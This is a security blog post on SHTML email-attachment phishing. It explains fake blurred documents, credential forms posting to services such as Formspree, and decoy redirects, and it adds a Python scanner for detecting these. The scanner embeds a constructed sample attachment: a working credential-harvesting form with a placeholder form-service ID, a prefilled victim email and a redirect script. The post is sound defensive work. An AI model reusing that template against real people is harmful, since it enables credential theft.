SHTML Phishing Attacks

@ducklah 17 May 2023

Threat Actor



The attacker has been abusing server-parsed HTML (SHTML) files. In phishing campaigns, SHTML files are commonly used either to redirect users to malicious, credential-stealing websites or to display phishing forms locally within the browser in order to harvest sensitive user information.

Attackers victimize users by distributing SHTML files as email attachments. The lures used in such phishing emails include a payment confirmation, an invoice, a shipment notice, etc. The email contains a short thread of messages to make the recipient more curious to open the attachment.

When the SHTML attachment is opened, it displays a blurred fake document with a login page in the browser. To read the document, the user must enter his or her credentials. In some cases, the email address is prefilled.

Attackers commonly embed JavaScript in the SHTML attachments to generate the phishing form, to redirect the browser, or to hide malicious URLs and behavior.

Abusing submission form services:

Phishing attacks abuse static form service providers such as Formspree and Formspark to steal sensitive user information. These are back-end services that allow developers to easily add forms to their website without writing server-side code; they also handle form processing and storage. They take HTML form submissions and send the results to an email address.

The attackers use the form service's URL as the form's action URL, which defines where the form data will be sent. When the user enters the credentials and hits the "submit" button, the data is sent to the form service, which subsequently forwards the information to the email address the attacker specified. To prevent the user from recognizing that they have just been phished, the attacker redirects the user's browser to an unrelated error page on a legitimate website.
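As an added defensive example (not code from the original post), the following Python script scans the HTML source of a mail attachment for the indicators described above: a form whose action points at a third-party form back-end such as Formspree or Formspark, a password field, a prefilled email address, a CSS blur over the page and a JavaScript redirect. The sample attachment, its placeholder form ID and the example.com hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Static form back-ends named in the post; a triage watch-list, not a verdict on the services themselves.
FORM_BACKEND_DOMAINS = {"formspree.io", "formspark.io"}


class FormScanner(HTMLParser):
    """Collects <form> action URLs and <input> fields from (S)HTML source."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.inputs = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # html.parser lowercases tag and attribute names
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input":
            self.inputs.append((a.get("type", "text").lower(), a.get("name", ""), a.get("value", "")))


def scan_attachment(html: str) -> list:
    """Return the phishing indicators found in one attachment's HTML source."""
    p = FormScanner()
    p.feed(html)
    findings = []
    for action in p.form_actions:
        host = (urlparse(action).hostname or "").lower()
        if any(host == d or host.endswith("." + d) for d in FORM_BACKEND_DOMAINS):
            findings.append(f"form posts to third-party form back-end: {host}")
    if any(t == "password" for t, _, _ in p.inputs):
        findings.append("password field inside a mail attachment")
    for _, name, value in p.inputs:
        if "@" in value:  # prefilled victim address, as the post describes
            findings.append(f"prefilled email address in field '{name}'")
    if re.search(r"filter\s*:\s*blur\(", html, re.I):
        findings.append("CSS blur over page content (fake blurred document)")
    if re.search(r"location\.(href|replace)\s*[=(]", html, re.I):
        findings.append("JavaScript redirect, consistent with a post-submit decoy page")
    return findings


# Constructed sample attachment (placeholder form ID, example.com hosts), not a real campaign artifact.
SAMPLE_SHTML = """<html><head><style>.doc{filter:blur(4px)}</style></head><body>
<div class="doc">Invoice INV-0001 ... payment confirmation ...</div>
<form action="https://formspree.io/f/PLACEHOLDER_FORM_ID" method="POST">
  <input type="email" name="email" value="victim@example.com">
  <input type="password" name="password" placeholder="Password">
  <button type="submit">View document</button></form>
<script>document.forms[0].onsubmit = function () { setTimeout(function () { location.href = "https://www.example.com/error404"; }, 300); };</script>
</body></html>"""
```

Run `scan_attachment` over each HTML or SHTML attachment extracted from mail; several findings together on one attachment are a strong triage signal, while a lone form back-end hit on its own may simply be a legitimate contact form.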

